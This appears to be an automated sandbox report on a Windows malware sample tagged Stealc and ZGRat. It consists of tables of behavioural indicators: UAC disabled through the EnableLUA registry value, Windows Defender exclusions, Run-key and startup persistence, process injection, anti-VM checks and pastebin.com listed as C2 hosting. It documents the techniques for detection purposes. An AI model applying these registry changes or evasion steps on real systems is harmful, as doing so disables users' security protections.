| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
ZGRat
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IhdA8kGYCJ7pM22YuVOKDfB6.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K7gZzdgjUiY3QyM00vsQEIk5.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pQJacl2Bf7LzHavCMG3hKLj.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lM3zkzFQczpDAHvJH7vWTU0q.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHu5gmDPrdHQrxBALgEWcRKb.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vUN0CKZe3wKRDvMmRMVSstse.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vjZEleAXp56EtwGN39UQAyp2.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2272 set thread context of 4556 | N/A | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u318.0.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u318.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u318.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
